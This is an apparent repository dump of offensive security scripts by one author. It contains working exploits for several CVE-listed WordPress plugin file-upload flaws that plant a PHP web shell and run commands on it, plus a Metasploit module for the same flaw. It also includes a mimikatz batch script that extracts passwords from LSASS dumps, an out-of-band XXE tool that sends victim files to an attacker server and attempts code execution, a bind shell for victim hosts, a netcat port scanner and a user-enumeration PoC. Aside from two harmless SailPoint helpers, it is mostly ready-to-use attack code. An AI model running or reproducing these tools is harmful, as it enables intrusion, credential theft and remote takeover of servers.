'2017-1002002'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8773), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin webapp-builder v2.0', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'webapp-builder', 'server', 'images', respShell.strip) 79 | print_status("Requesting #{@shellLoc}") 80 | res = send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /mimi_multidump.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | rem This is a script that takes all .dmp files in the current folder and uses mimikatz to dump them 3 | rem you can modify items in the script 4 | echo " " 5 | echo ################################### 6 | echo #Mimikatz Dumper By Munir Njiru # 7 | echo ################################### 8 | echo " " 9 | setlocal enabledelayedexpansion 10 | for %%f in (*.dmp) do ( 11 | rem pick file name from above without extension 12 | SET lsass_dump=%%~nf 13 | rem my files follow a naming convention i.e. lsass_hostname_or_ip.dmp 14 | rem this section renames the lsass prefix to passwords prefix to seperate dump from textfile i.e. passwords_hostname_or_ip.dmp 15 | SET password_file=!lsass_dump:lsass=passwords! 16 | rem mimi64 references my global mimikatz parameter change to suit yours; you can add mimikatz to environment variables to access it globally 17 | mimi64 "sekurlsa::minidump !lsass_dump!.dmp" "log !password_file!.txt" sekurlsa::logonpasswords exit 18 | echo "done dumping !lsass_dump!.dmp to !password_file!.txt" 19 | ) 20 | exit 21 | -------------------------------------------------------------------------------- /oob_xxe/server/checkrce.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/dtd: -------------------------------------------------------------------------------- 1 | ">%all; -------------------------------------------------------------------------------- /oob_xxe/server/getFile.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/getFileEncoded.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/rceEncoded.dtd: -------------------------------------------------------------------------------- 1 | 2 | "> -------------------------------------------------------------------------------- /oob_xxe/server/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Simply a replication of the Python SimpleHTTPServer but with added functionality to simply log requests 3 | __author__ = "Munir Njiru" 4 | __email__ = "munir@alien-within.com" 5 | __status__ = "Production" 6 | 7 | import SimpleHTTPServer as xxeDTDServer 8 | import SocketServer 9 | import sys 10 | import base64 11 | 12 | PORT = 8000 13 | 14 | class xxeServerHandler(xxeDTDServer.SimpleHTTPRequestHandler): 15 | log_file = open('xxelog.txt', 'a') 16 | def log_message(self, format, *args): 17 | self.log_file.write("%s - - [%s] %s\n" % 18 | (self.client_address[0], 19 | self.log_date_time_string(), 20 | base64.b64decode(format%args))) 21 | 22 | try: 23 | Handler = xxeServerHandler 24 | httpd = SocketServer.TCPServer(("", PORT), Handler) 25 | print "Starting XXE Server on port: ", PORT 26 | print 'Press ^C to shut down the web server' 27 | httpd.serve_forever() 28 | except: 29 | print '^C received, shutting down the web server' 30 | httpd.socket.close() -------------------------------------------------------------------------------- /oob_xxe/server/xxelog.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/oob_xxe/server/xxelog.txt -------------------------------------------------------------------------------- /oob_xxe/xxe_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | import requests as alienOOBXXERequestor 7 | import tldextract 8 | 9 | print "#######################################\n" 10 | print "Simple Out of Band XXE Injection Tool.\nby Alienwithin\nVersion: 1.0\nWebsite: https://www.alien-within.com\n" 11 | print "#######################################\n\n" 12 | ''' 13 | Basic Settings that should be changed below: 14 | - Endpoint to attack or webservice URL 15 | - IP and Port of python simple http server (i.e attacker's server to receive information) or XXE Server Component 16 | ''' 17 | attacker_ip = "ATTACKER IP" 18 | attacker_port = "ATTACKER PORT" 19 | endpoint = "URL TO VICTIM WEBSERVICE e.g. http://target.com/webservice.php" 20 | fullURL=tldextract.extract(endpoint) 21 | targetHostname=fullURL.domain 22 | ''' 23 | Basic Settings End 24 | 25 | Ignore the below its basic Headers predefined 26 | ''' 27 | 28 | XXEHeaders = { 29 | 'Host': targetHostname, 30 | 'Accept': 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', 31 | 'Accept-Encoding': 'gzip, deflate', 32 | 'Accept-Language': 'en-us,en;q=0.5', 33 | 'Cache-Control': 'no-cache', 34 | 'Content-Type': 'text/xml', 35 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36', 36 | 'X-HTTP-Method-Override': 'GET' 37 | } 38 | 39 | ''' 40 | From this section downwards we have the Four attack Types supported so far: 41 | - Pinging to see if we can force it to connect to our target server from the target 42 | - Retrieve File with no encoding 43 | - Retrieve file base64 encoded incase of borderline protection 44 | - Attempt RCE via the expect module if it is loaded (PHP only) 45 | ''' 46 | attack_type = raw_input("What attack type would you like to execute?\n1. Simple Connect Back Request\n2. Attempt to Retrieve File (File Protocol)\n3. Attempt to retrieve file (Using PHP filter wrapper)\n4. Check Code execution using expect\n") 47 | 48 | if attack_type=="1": 49 | print "Please ensure you have started python HTTP Server in another commandline tab; to do so run the command below:\npython -m SimpleHTTPServer\n\nAfter this is done please confirm that the IP address and port are configured in the script in the settings section.\n" 50 | check_complete=raw_input("Proceed with attack?\n1. Yes\n2. No\n") 51 | if check_complete == "1": 52 | connect_back = " %dtd;]>&a;" 53 | testConnectBack = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data={'name':connect_back}) 54 | print testConnectBack.text 55 | else: 56 | print "User aborted the attack; script will now exit. " 57 | exit() 58 | 59 | elif attack_type == "2": 60 | getFilePlain = " %get%dtd;]>" 61 | testPlainFileRetrieve=alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=getFilePlain) 62 | print testPlainFileRetrieve.text 63 | 64 | elif attack_type == "3": 65 | getFileEncoded = " %remote; %internal; %xxe; ]>" 66 | testEncodedFileRetrieve = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=getFileEncoded) 67 | print testEncodedFileRetrieve.text 68 | 69 | elif attack_type == "4": 70 | checkRCE = " %remote; %internal; %xxe; ]>" 71 | testRCE = alienOOBXXERequestor.post(endpoint,headers=XXEHeaders,data=checkRCE) 72 | print testRCE.text 73 | 74 | else: 75 | print "I really don't know the attack type you are trying to run I will now exit" 76 | exit() 77 | 78 | -------------------------------------------------------------------------------- /portscan/nc_portscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Script to conduct portscans via netcat when Nmap is not working in environments for some reason 3 | #By Munir Njiru 4 | 5 | ##Config Elements 6 | output_file='top_1000_ports_found.txt' # File that will contain the ports found 7 | port_range='ports_1000.txt' #File that contains various port ranges or individual ports to check 8 | ip_addresses='scan_ips.txt' #file containing IP addresses to scan 9 | ## End Config 10 | while read ip; do 11 | while read portrange; do 12 | echo "Working on... $ip and $portrange" 13 | nc -zvw 1 $ip $portrange 2>&1 |grep succeeded | tee -a $output_file 14 | done <$port_range 15 | done <$ip_addresses 16 | -------------------------------------------------------------------------------- /portscan/ports_1000.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 3-4 3 | 6-7 4 | 9 5 | 13 6 | 17 7 | 19-26 8 | 30 9 | 32-33 10 | 37 11 | 42-43 12 | 49 13 | 53 14 | 70 15 | 79-85 16 | 88-90 17 | 99-100 18 | 106 19 | 109-111 20 | 113 21 | 119 22 | 125 23 | 135 24 | 139 25 | 143-144 26 | 146 27 | 161 28 | 163 29 | 179 30 | 199 31 | 211-212 32 | 222 33 | 254-256 34 | 259 35 | 264 36 | 280 37 | 301 38 | 306 39 | 311 40 | 340 41 | 366 42 | 389 43 | 406-407 44 | 416-417 45 | 425 46 | 427 47 | 443-445 48 | 458 49 | 464-465 50 | 481 51 | 497 52 | 500 53 | 512-515 54 | 524 55 | 541 56 | 543-545 57 | 548 58 | 554-555 59 | 563 60 | 587 61 | 593 62 | 616-617 63 | 625 64 | 631 65 | 636 66 | 646 67 | 648 68 | 666-668 69 | 683 70 | 687 71 | 691 72 | 700 73 | 705 74 | 711 75 | 714 76 | 720 77 | 722 78 | 726 79 | 749 80 | 765 81 | 777 82 | 783 83 | 787 84 | 800-801 85 | 808 86 | 843 87 | 873 88 | 880 89 | 888 90 | 898 91 | 900-903 92 | 911-912 93 | 981 94 | 987 95 | 990 96 | 992-993 97 | 995 98 | 999-1002 99 | 1007 100 | 1009-1011 101 | 1021-1100 102 | 1102 103 | 1104-1108 104 | 1110-1114 105 | 1117 106 | 1119 107 | 1121-1124 108 | 1126 109 | 1130-1132 110 | 1137-1138 111 | 1141 112 | 1145 113 | 1147-1149 114 | 1151-1152 115 | 1154 116 | 1163-1166 117 | 1169 118 | 1174-1175 119 | 1183 120 | 1185-1187 121 | 1192 122 | 1198-1199 123 | 1201 124 | 1213 125 | 1216-1218 126 | 1233-1234 127 | 1236 128 | 1244 129 | 1247-1248 130 | 1259 131 | 1271-1272 132 | 1277 133 | 1287 134 | 1296 135 | 1300-1301 136 | 1309-1311 137 | 1322 138 | 1328 139 | 1334 140 | 1352 141 | 1417 142 | 1433-1434 143 | 1443 144 | 1455 145 | 1461 146 | 1494 147 | 1500-1501 148 | 1503 149 | 1521 150 | 1524 151 | 1533 152 | 1556 153 | 1580 154 | 1583 155 | 1594 156 | 1600 157 | 1641 158 | 1658 159 | 1666 160 | 1687-1688 161 | 1700 162 | 1717-1721 163 | 1723 164 | 1755 165 | 1761 166 | 1782-1783 167 | 1801 168 | 1805 169 | 1812 170 | 1839-1840 171 | 1862-1864 172 | 1875 173 | 1900 174 | 1914 175 | 1935 176 | 1947 177 | 1971-1972 178 | 1974 179 | 1984 180 | 1998-2010 181 | 2013 182 | 2020-2022 183 | 2030 184 | 2033-2035 185 | 2038 186 | 2040-2043 187 | 2045-2049 188 | 2065 189 | 2068 190 | 2099-2100 191 | 2103 192 | 2105-2107 193 | 2111 194 | 2119 195 | 2121 196 | 2126 197 | 2135 198 | 2144 199 | 2160-2161 200 | 2170 201 | 2179 202 | 2190-2191 203 | 2196 204 | 2200 205 | 2222 206 | 2251 207 | 2260 208 | 2288 209 | 2301 210 | 2323 211 | 2366 212 | 2381-2383 213 | 2393-2394 214 | 2399 215 | 2401 216 | 2492 217 | 2500 218 | 2522 219 | 2525 220 | 2557 221 | 2601-2602 222 | 2604-2605 223 | 2607-2608 224 | 2638 225 | 2701-2702 226 | 2710 227 | 2717-2718 228 | 2725 229 | 2800 230 | 2809 231 | 2811 232 | 2869 233 | 2875 234 | 2909-2910 235 | 2920 236 | 2967-2968 237 | 2998 238 | 3000-3001 239 | 3003 240 | 3005-3007 241 | 3011 242 | 3013 243 | 3017 244 | 3030-3031 245 | 3052 246 | 3071 247 | 3077 248 | 3128 249 | 3168 250 | 3211 251 | 3221 252 | 3260-3261 253 | 3268-3269 254 | 3283 255 | 3300-3301 256 | 3306 257 | 3322-3325 258 | 3333 259 | 3351 260 | 3367 261 | 3369-3372 262 | 3389-3390 263 | 3404 264 | 3476 265 | 3493 266 | 3517 267 | 3527 268 | 3546 269 | 3551 270 | 3580 271 | 3659 272 | 3689-3690 273 | 3703 274 | 3737 275 | 3766 276 | 3784 277 | 3800-3801 278 | 3809 279 | 3814 280 | 3826-3828 281 | 3851 282 | 3869 283 | 3871 284 | 3878 285 | 3880 286 | 3889 287 | 3905 288 | 3914 289 | 3918 290 | 3920 291 | 3945 292 | 3971 293 | 3986 294 | 3995 295 | 3998 296 | 4000-4006 297 | 4045 298 | 4111 299 | 4125-4126 300 | 4129 301 | 4224 302 | 4242 303 | 4279 304 | 4321 305 | 4343 306 | 4443-4446 307 | 4449 308 | 4550 309 | 4567 310 | 4662 311 | 4848 312 | 4899-4900 313 | 4998 314 | 5000-5004 315 | 5009 316 | 5030 317 | 5033 318 | 5050-5051 319 | 5054 320 | 5060-5061 321 | 5080 322 | 5087 323 | 5100-5102 324 | 5120 325 | 5190 326 | 5200 327 | 5214 328 | 5221-5222 329 | 5225-5226 330 | 5269 331 | 5280 332 | 5298 333 | 5357 334 | 5405 335 | 5414 336 | 5431-5432 337 | 5440 338 | 5500 339 | 5510 340 | 5544 341 | 5550 342 | 5555 343 | 5560 344 | 5566 345 | 5631 346 | 5633 347 | 5666 348 | 5678-5679 349 | 5718 350 | 5730 351 | 5800-5802 352 | 5810-5811 353 | 5815 354 | 5822 355 | 5825 356 | 5850 357 | 5859 358 | 5862 359 | 5877 360 | 5900-5904 361 | 5906-5907 362 | 5910-5911 363 | 5915 364 | 5922 365 | 5925 366 | 5950 367 | 5952 368 | 5959-5963 369 | 5987-5989 370 | 5998-6007 371 | 6009 372 | 6025 373 | 6059 374 | 6100-6101 375 | 6106 376 | 6112 377 | 6123 378 | 6129 379 | 6156 380 | 6346 381 | 6389 382 | 6502 383 | 6510 384 | 6543 385 | 6547 386 | 6565-6567 387 | 6580 388 | 6646 389 | 6666-6669 390 | 6689 391 | 6692 392 | 6699 393 | 6779 394 | 6788-6789 395 | 6792 396 | 6839 397 | 6881 398 | 6901 399 | 6969 400 | 7000-7002 401 | 7004 402 | 7007 403 | 7019 404 | 7025 405 | 7070 406 | 7100 407 | 7103 408 | 7106 409 | 7200-7201 410 | 7402 411 | 7435 412 | 7443 413 | 7496 414 | 7512 415 | 7625 416 | 7627 417 | 7676 418 | 7741 419 | 7777-7778 420 | 7800 421 | 7911 422 | 7920-7921 423 | 7937-7938 424 | 7999-8002 425 | 8007-8011 426 | 8021-8022 427 | 8031 428 | 8042 429 | 8045 430 | 8080-8090 431 | 8093 432 | 8099-8100 433 | 8180-8181 434 | 8192-8194 435 | 8200 436 | 8222 437 | 8254 438 | 8290-8292 439 | 8300 440 | 8333 441 | 8383 442 | 8400 443 | 8402 444 | 8443 445 | 8500 446 | 8600 447 | 8649 448 | 8651-8652 449 | 8654 450 | 8701 451 | 8800 452 | 8873 453 | 8888 454 | 8899 455 | 8994 456 | 9000-9003 457 | 9009-9011 458 | 9040 459 | 9050 460 | 9071 461 | 9080-9081 462 | 9090-9091 463 | 9099-9103 464 | 9110-9111 465 | 9200 466 | 9207 467 | 9220 468 | 9290 469 | 9415 470 | 9418 471 | 9485 472 | 9500 473 | 9502-9503 474 | 9535 475 | 9575 476 | 9593-9595 477 | 9618 478 | 9666 479 | 9876-9878 480 | 9898 481 | 9900 482 | 9917 483 | 9929 484 | 9943-9944 485 | 9968 486 | 9998-10004 487 | 10009-10010 488 | 10012 489 | 10024-10025 490 | 10082 491 | 10180 492 | 10215 493 | 10243 494 | 10566 495 | 10616-10617 496 | 10621 497 | 10626 498 | 10628-10629 499 | 10778 500 | 11110-11111 501 | 11967 502 | 12000 503 | 12174 504 | 12265 505 | 12345 506 | 13456 507 | 13722 508 | 13782-13783 509 | 14000 510 | 14238 511 | 14441-14442 512 | 15000 513 | 15002-15004 514 | 15660 515 | 15742 516 | 16000-16001 517 | 16012 518 | 16016 519 | 16018 520 | 16080 521 | 16113 522 | 16992-16993 523 | 17877 524 | 17988 525 | 18040 526 | 18101 527 | 18988 528 | 19101 529 | 19283 530 | 19315 531 | 19350 532 | 19780 533 | 19801 534 | 19842 535 | 20000 536 | 20005 537 | 20031 538 | 20221-20222 539 | 20828 540 | 21571 541 | 22939 542 | 23502 543 | 24444 544 | 24800 545 | 25734-25735 546 | 26214 547 | 27000 548 | 27352-27353 549 | 27355-27356 550 | 27715 551 | 28201 552 | 30000 553 | 30718 554 | 30951 555 | 31038 556 | 31337 557 | 32768-32785 558 | 33354 559 | 33899 560 | 34571-34573 561 | 35500 562 | 38292 563 | 40193 564 | 40911 565 | 41511 566 | 42510 567 | 44176 568 | 44442-44443 569 | 44501 570 | 45100 571 | 48080 572 | 49152-49161 573 | 49163 574 | 49165 575 | 49167 576 | 49175-49176 577 | 49400 578 | 49999-50003 579 | 50006 580 | 50300 581 | 50389 582 | 50500 583 | 50636 584 | 50800 585 | 51103 586 | 51493 587 | 52673 588 | 52822 589 | 52848 590 | 52869 591 | 54045 592 | 54328 593 | 55055-55056 594 | 55555 595 | 55600 596 | 56737-56738 597 | 57294 598 | 57797 599 | 58080 600 | 60020 601 | 60443 602 | 61532 603 | 61900 604 | 62078 605 | 63331 606 | 64623 607 | 64680 608 | 65000 609 | 65129 610 | 65389 611 | 280 612 | 4567 613 | 7001 614 | 8008 615 | 9080 -------------------------------------------------------------------------------- /portscan/readme.md: -------------------------------------------------------------------------------- 1 | ### Scanning Complex Environments 2 | This script comes in handy when in an environment that contains safeguards against scanning; 3 | It does connects to ports and records those that respond. 4 | 5 | To run it is simple after configuring the 3 files to use 6 | ``` 7 | sh nc_portscan.sh 8 | ``` 9 | 10 | ## Simple Script Flow 11 | 12 | ![Simple Flow](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/portscan/simple_flow.jpg) -------------------------------------------------------------------------------- /portscan/simple_flow.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/portscan/simple_flow.jpg -------------------------------------------------------------------------------- /pyrequires.txt: -------------------------------------------------------------------------------- 1 | requests 2 | json 3 | -------------------------------------------------------------------------------- /sailpoint/beanshell_json_compatible.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | ''' 6 | This script takes a regular bean shell script and 7 | parses it into a json compatible one liner from a 8 | python dictionary and escapes it to JSON in one liner 9 | format for passing to the API 10 | ''' 11 | import argparse 12 | import random 13 | import string 14 | import json 15 | global json_bean, output_file, bmr_string, bmr_file, the_script 16 | parser = argparse.ArgumentParser() 17 | parser.add_argument('-f', '--file', help='Load a text file with the beanshell code') 18 | args = parser.parse_args() 19 | def to_sailpoint_json_bmr(bmr_string): 20 | 21 | file_name= ''.join(random.choice(string.ascii_letters) for i in range(10))+".json" 22 | output_file = open(str(file_name), "a") 23 | the_script={ 24 | "version": "1.0", 25 | "script": bmr_string 26 | } 27 | json.dump(the_script,output_file) 28 | output_file.close() 29 | print("output written to: "+str(file_name)) 30 | 31 | if args.file is not None: 32 | bmr_file = args.file 33 | beanshell_clean = open(bmr_file) 34 | bmr_string = beanshell_clean.read() 35 | beanshell_clean.close() 36 | to_sailpoint_json_bmr(bmr_string) 37 | -------------------------------------------------------------------------------- /sailpoint/build_map_rule_cleaner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | ''' 6 | This script takes a minified bean shell script from the Sailpoint API and 7 | parses it into a neat java file to allow editing later. 8 | ''' 9 | import argparse 10 | import random 11 | import string 12 | global clean_shell,output_file, bmr_string, bmr_file 13 | parser = argparse.ArgumentParser() 14 | parser.add_argument('-f', '--file', help='Load a text file with the beanshell code') 15 | parser.add_argument('-s', '--string', help='Paste a string the beanshell code') 16 | args = parser.parse_args() 17 | def from_string(bmr_string): 18 | clean_shell = bmr_string.replace('\"','"').replace('\\n', '\n').replace('\\t', '\t') 19 | file_name= ''.join(random.choice(string.ascii_letters) for i in range(10))+".bsh" 20 | output_file = open(str(file_name), "a") 21 | output_file.write(clean_shell) 22 | output_file.close() 23 | print("output written to: "+str(file_name)) 24 | 25 | if args.file is not None: 26 | bmr_file = args.file 27 | beanshell_dirty = open(bmr_file) 28 | bmr_string = beanshell_dirty.read().replace('\"','"') 29 | beanshell_dirty.close() 30 | from_string(str(bmr_string)) 31 | elif args.string is not None: 32 | bmr_string = args.string 33 | from_string(bmr_string) -------------------------------------------------------------------------------- /simple_netcat_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | #To connect to it upload the script on the victim server 7 | #On your attack machine run the command below: 8 | 9 | #nc target-ip target-port 10 | 11 | ########################################## 12 | # Simple Reverse Listener 13 | # by Alienwithin 14 | ########################################### 15 | import socket 16 | import subprocess 17 | import sys 18 | import os 19 | ip = "victim-ip" 20 | port = 4445 21 | 22 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | server.bind((ip, port)) 24 | server.listen(10) 25 | 26 | print ("Listener ready on %s:%d" % (ip,port)) 27 | 28 | client, addr = server.accept() 29 | 30 | print ("Connected to %s on port %d" % (ip,port)) 31 | hostinfo=os.getenv('USERNAME')+"@"+socket.gethostname()+"~" 32 | while True: 33 | data = str(client.recv(1024)) 34 | data = data.strip() 35 | if not data: 36 | client.sendall(hostinfo+os.getcwd()+"# command cannot be blank my friend \n"+hostinfo+os.getcwd()+"#"+" ") 37 | print "" 38 | elif "cd" in data.strip(): 39 | pathExtract = data.replace ("cd ", "") 40 | os.chdir(pathExtract) 41 | client.sendall(hostinfo+os.getcwd()+"# Switched Path to: "+os.getcwd()+"\n"+hostinfo+os.getcwd()+"#"+" ") 42 | elif data.strip() == "pwd": 43 | client.sendall(hostinfo+os.getcwd()+"#"+" "+" "+os.getcwd()+"\n"+hostinfo+os.getcwd()+"#"+" ") 44 | elif data.strip() == "terminate": 45 | client.sendall("bye buddy") 46 | client.close() 47 | sys.exit(0) 48 | else: 49 | output = subprocess.check_output(data, shell=True) 50 | output=hostinfo+os.getcwd()+"#"+" "+output+"\n"+hostinfo+os.getcwd()+"#"+" " 51 | client.sendall(output) 52 | -------------------------------------------------------------------------------- /wp_ue_api.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | print "#############################################################" 4 | print "\tWordpress 4.7 User Enumeration PoC (CVE 2017-5487)\n\t\t\tWPVDB ID: 8715\n\n\t\t\tBy Alienwithin" 5 | print "#############################################################\n\n" 6 | targetSite = raw_input("Please enter the URL to target e.g. http://target.com : \nSite URL: ") 7 | NumberOfUsers = raw_input("Please enter the number of users to retrieve e.g. 10\n") 8 | print "ID || Username || Full Name\n\n" 9 | for users in range(1, int(NumberOfUsers)): 10 | req = requests.get(targetSite+'/wp-json/wp/v2/users/'+str(users)) 11 | target_info_parsed = json.loads(req.text) 12 | if 'id' not in target_info_parsed: 13 | print "No user with ID :" + str(users) 14 | req.close() 15 | else: 16 | target_id = target_info_parsed['id'] 17 | target_name = target_info_parsed['name'] 18 | target_username = target_info_parsed['slug'] 19 | print str(target_id)+ " || "+ str(target_username) + " || "+ str(target_name)+"\n" 20 | req.close() 21 | 22 | -------------------------------------------------------------------------------- /zen_app_mobile_wp_rfu.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | print "---------------------------------------------------------------------" 5 | print "Multiple Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182" 6 | print "---------------------------------------------------------------------" 7 | victim = raw_input("Please Enter victim host e.g. http://example.com: ") 8 | plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n") 9 | if plug_choice=="1": 10 | plugin="zen-mobile-app-native" 11 | elif plug_choice=="2": 12 | plugin="webapp-builder" 13 | elif plug_choice=="3": 14 | plugin="wp2android-turn-wp-site-into-android-app" 15 | elif plug_choice=="4": 16 | plugin="mobile-app-builder-by-wappress" 17 | elif plug_choice=="5": 18 | plugin="mobile-friendly-app-builder-by-easytouch" 19 | else: 20 | print "Invalid Plugin choice, I will now exit" 21 | quit() 22 | slug = "/wp-content/plugins/"+plugin+"/server/images.php" 23 | target=victim+slug 24 | def definShell(size=6, chars=string.ascii_uppercase + string.digits): 25 | return ''.join(random.choice(chars) for _ in range(size)) 26 | 27 | shellName= definShell()+".php" 28 | 29 | def checkExistence(): 30 | litmusTest = requests.get(target) 31 | litmusState = litmusTest.status_code 32 | if litmusState == 200: 33 | print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..." 34 | exploit() 35 | else: 36 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 37 | quit() 38 | 39 | def exploit(): 40 | print "\nGenerating Payload: "+shellName+"\n" 41 | myShell = {'file': (shellName, '')} 42 | shellEmUp = requests.post(target, files=myShell) 43 | respShell = shellEmUp.text 44 | cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/") 45 | shellLoc = cleanURL.replace(" ", "") 46 | print "Confirming shell upload by printing current user\n" 47 | shellTest=requests.get(shellLoc+"?alien=whoami") 48 | webserverUser=shellTest.text 49 | if webserverUser == "": 50 | print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami" 51 | quit() 52 | else: 53 | print "The current webserver user is: "+webserverUser+"\n" 54 | print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command" 55 | quit() 56 | 57 | if __name__ == "__main__": 58 | checkExistence() 59 | --------------------------------------------------------------------------------